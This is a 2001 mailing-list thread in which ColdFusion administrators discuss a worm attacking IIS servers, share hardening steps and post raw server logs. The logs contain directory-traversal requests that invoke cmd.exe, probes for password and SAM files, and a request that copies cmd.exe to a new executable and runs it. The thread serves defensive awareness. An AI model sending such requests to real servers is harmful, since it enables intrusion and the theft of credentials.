but this was an exploit (according to what i've read) of SEVEN month old
security issue.
i can sympathize with being "hacked", but we admins also need to be very
alert and up-to-date on these issues. i'm not saying i'm perfect, but
there's a few perspectives to this most recent group of attacks. it's not
like it was an undocumented problem, or even a new one.
-----Original Message-----
From: Erika L Walker [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 09, 2001 10:07 AM
To: CF-Community
Subject: RE: Log files of a web attack.
Ahh....but someone (a hacker more than likely) had to create the worm in the
first place.
Either way, it's a da** pain in the you know what!
Erika
(with a *K*)
To laugh often and much; to win the respect of intelligent people and the
affection of children; to earn the appreciation of honest critics and endure
the betrayal of false friends; to appreciate beauty, to find the best in
others; to leave the world a bit better, whether by a healthy child, a
garden, or a redeemed social condition; to know even one life has breathed
easier because you have lived. This is to have succeeded." - Ralph Waldo
Emerson
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 09, 2001 12:15 PM
To: CF-Community
Subject: RE: Log files of a web attack.
Hello All,
If you have been hit by this "hack", it isn't a hack. It's a worm.
http://www.internetnews.com/wd-news/article/0,,10_761061,00.html this
article has all the info.
Cheers
J "Darin" Thomas - Web Developer
Destin Resorts
[EMAIL PROTECTED]
-----Original Message-----
From: Erika L Walker [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 08, 2001 11:30 PM
To: CF-Community
Subject: FW: Log files of a web attack.
In light of recent hack attacks.....this was posted on CF-Talk.....not that
the people here aren't on CF-Talk, but, ya know, someone said we should pass
around this info so we know how to deal with it and what to look for...so
here's some more info! <grin>
(lettuce, mayo, pickle on a sesame seed bun....)
ReplaceNoCase("Erica", "c", "k", "ALL")
"Once in a while it really hits people that they don't have to experience
the world in the way they have been told to." - Alan Keightley
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 08, 2001 9:52 PM
To: CF-Talk
Subject: OT: Log files of a web attack.
Hi,
I thought the group would like to see the techniques of a recent attack on
our web servers. They've been doing this a couple times a day for a week.
UUNet (their ISP) is slow in doing stopping them.
To secure IIS we've removed all extensions except cfm. We've taken out all
the iis folders and files like /mdac, /scripts and /printers. We've secured
cfide folder with passwords including locking out the user after a couple
failed attempts and log the failures. Lastly, we've remove all permissions
from cmd.exe.
This has kept them out to date. Any additional ideas are welcomed. Non of
this is top secret info, the hackers already know it, but do you and are you
protected?
HTH,
Rick Moon
2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET
/scripts/..%pc../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:45 209.183.204.251 - myIP 80 GET
/scripts/..%9v../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:56 209.183.204.251 - myIP 80 GET
/scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET
/scripts/..%8s../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET
/scripts/...../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:04 209.183.204.251 - myIP 80 GET
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET
/scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET
/scripts/..???../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:38:17 209.183.204.251 - myIP 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 01:26:07 200.245.48.155 - myIP GET
/scripts..\../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:57:58 200.230.112.153 - myIP 80 GET
/iisadmpwd/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:00 200.230.112.153 - myIP 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:14 200.230.112.153 - myIP 80 GET
/cgi-bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:22 200.230.112.153 - myIP 80 GET
/samples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:29 200.230.112.153 - myIP 80 GET
/_vti_cnf/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:36 200.230.112.153 - myIP 80 GET
/_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:42 200.230.112.153 - myIP 80 GET
/adsamples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:43:02 200.245.48.132 - myIP 80 HEAD /aaa - 404 -
2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /carbo.dll - 404 -
2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /cgi-win/uploader.exe -
404 -
2001-05-05 02:43:06 200.245.48.132 - myIP 80 HEAD /search97.vts - 404 -
2001-05-05 02:43:08 200.245.48.132 - myIP 80 HEAD /_vti_inf.html - 200 -
2001-05-05 02:43:10 200.245.48.132 - myIP 80 HEAD /_vti_pvt/service.pwd -
404 -
2001-05-05 02:43:12 200.245.48.132 - myIP 80 HEAD /_vti_pvt/users.pwd -
404 -
2001-05-05 02:43:13 200.245.48.132 - myIP 80 HEAD /_vti_pvt/authors.pwd -
404 -
2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /....../autoexec.bat -
404 -
2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /..../config.sys - 404 -
2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/achg.htr -
404 -
2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp.htr -
404 -
2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2.htr -
404 -
2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2b.htr -
404 -
2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp3.htr -
404 -
2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4.htr -
404 -
2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4b.htr -
404 -
2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot.htr -
404 -
2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot3.htr -
404 -
2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /cgi-bin/visadmin.exe -
404 -
2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/no-such-file.pl -
404 -
2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/fpcount.exe -
404 -
2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/rguest.exe -
404 -
2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/wguest.exe -
404 -
2001-05-05 02:43:32 200.245.48.132 - myIP 80 HEAD /default.asp::$DATA -
404 -
2001-05-05 02:43:35 200.245.48.132 - myIP 80 HEAD
/msadc/Samples/SELECTOR/showcode.asp |-|0|404_Object_Not_Found 404 -
2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD
/adsamples/config/site.csc - 404 -
2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /scripts/iisadmin/ism.dll
http/dir 404 -
2001-05-05 02:43:37 200.245.48.132 - myIP 80 HEAD
/AdvWorks/equipment/catalog_type.asp |-|0|404_Object_Not_Found 404 -
2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD
/cfdocs/expelval/openfile.cfm - 401 -
2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD
/cfdocs/expelval/ExprCalc.cfm - 401 -
2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD
/cfdocs/expelval/displayopenedfile.cfm - 401 -
2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD
/cfdocs/expelval/sendmail.cfm - 401 -
2001-05-05 02:43:45 200.245.48.132 - myIP 80 HEAD /GetFile.cfm - 200 -
2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/get32.exe - 404 -
2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/alibaba.pl -
404 -
2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /cgi-bin/tst.bat - 404 -
2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /default.asp - 404 -
2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /winnt/repair/sam._ -
404 -
2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /cgi-bin/imagemap.exe -
404 -
2001-05-05 02:43:52 148.233.95.58 - myIP 80 GET /index.cfm - 200
Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98;+Win+9x+4.90)
2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /cgi-bin/cgitest.exe -
404 -
2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /config.sys - 404 -
2001-05-05 02:43:55 200.245.48.132 - myIP 80 HEAD /scripts/webbbs.exe -
404 -
2001-05-05 02:43:57 200.245.48.132 - myIP 80 HEAD /cgi-bin/input.bat - 404 -
2001-05-05 02:44:03 200.245.48.132 - myIP 80 HEAD /test.idq - 404 -
2001-05-05 02:44:04 200.245.48.132 - myIP 80 HEAD /test.ida - 404 -
2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /scripts/counter.exe -
404 -
2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /common/browser.inc -
404 -
2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/echo.bat - 404 -
2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/hello.bat - 404 -
2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /rightfax/fuwww.dll -
404 -
2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /scripts/cgimail.exe -
404 -
2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD
/officescan/cgi/jdkRqNotify.exe - 404 -
2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /ows-bin/perlidlc.bat &dir
404 -
2001-05-05 02:44:13 200.245.48.132 - myIP 80 HEAD /cgi-bin/windmail.exe -
404 -
2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /null.htw
CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full 404 -
2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD
/_vti_bin/_vti_aut/dvwssr.dll - 404 -
2001-05-05 02:44:17 200.245.48.132 - myIP 80 HEAD /scripts/wa.exe - 404 -
2001-05-05 02:45:22 200.64.239.78 - myIP 80 GET /index.cfm - 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
2001-05-05 02:46:23 200.53.250.14 - myIP 80 GET /index.cfm - 200
Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
2001-05-05 02:48:53 200.245.48.141 - myIP 80 HEAD /index.cfm - 200 -
2001-05-05 02:49:25 200.245.48.141 - myIP 80 GET
/scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:36 200.245.48.141 - myIP 80 GET
/scripts/..%8s../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:48 200.245.48.141 - myIP 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:53 200.245.48.141 - myIP 80 GET
/scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:50:05 200.245.48.141 - myIP 80 GET
/scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:50:11 200.245.48.141 - myIP 80 GET
/scripts/..???../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/newdsn.exe -
404 -
2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/getdrvs.exe -
404 -
2001-05-05 02:43:14 200.245.48.132 - myIP HEAD
/_vti_pvt/administrators.pwd - 404 -
2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.dll - 404 -
2001-05-05 02:43:16 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.exe - 404 -
2001-05-05 02:43:17 200.245.48.132 - myIP HEAD
/samples/search/queryhit.htm - 404 -
2001-05-05 02:43:33 200.245.48.132 - myIP HEAD
/iissamples/exair/howitworks/codebrws.asp - 404 -
2001-05-05 02:43:33 200.245.48.132 - myIP HEAD
/iissamples/sdk/asp/docs/codebrws.asp - 404 -
2001-05-05 02:43:56 200.245.48.132 - myIP HEAD /cgi-bin/test.bat - 404 -
2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /cgi-bin/input2.bat - 404 -
2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /ssi/envout.bat - 404 -
2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /msadc/msadcs.dll - 404 -
2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /cgi-bin/htimage.exe - 404 -
2001-05-05 02:44:02 200.245.48.132 - myIP HEAD /test.idc - 404 -
2001-05-05 02:44:05 200.245.48.132 - myIP HEAD /test.idw - 404 -
2001-05-05 02:44:11 200.245.48.132 - myIP HEAD /default.asp - 404 -
This is the really bad one.
2001-05-01 08:23:09 200.245.48.145 - myIP 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+copy%20c:\winnt\system32\cmd.exe%20sensepost.exe
2001-05-01 08:23:11 200.245.48.145 - myIP 80 GET
/scripts/../../inetpub/scripts/sensepost.exe /c+dir%20c:\inetpub\wwwroot
end.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at
http://www.fusionauthority.com/bkinfo.cfm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at
http://www.fusionauthority.com/bkinfo.cfm
Archives: http://www.mail-archive.com/cf-community@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
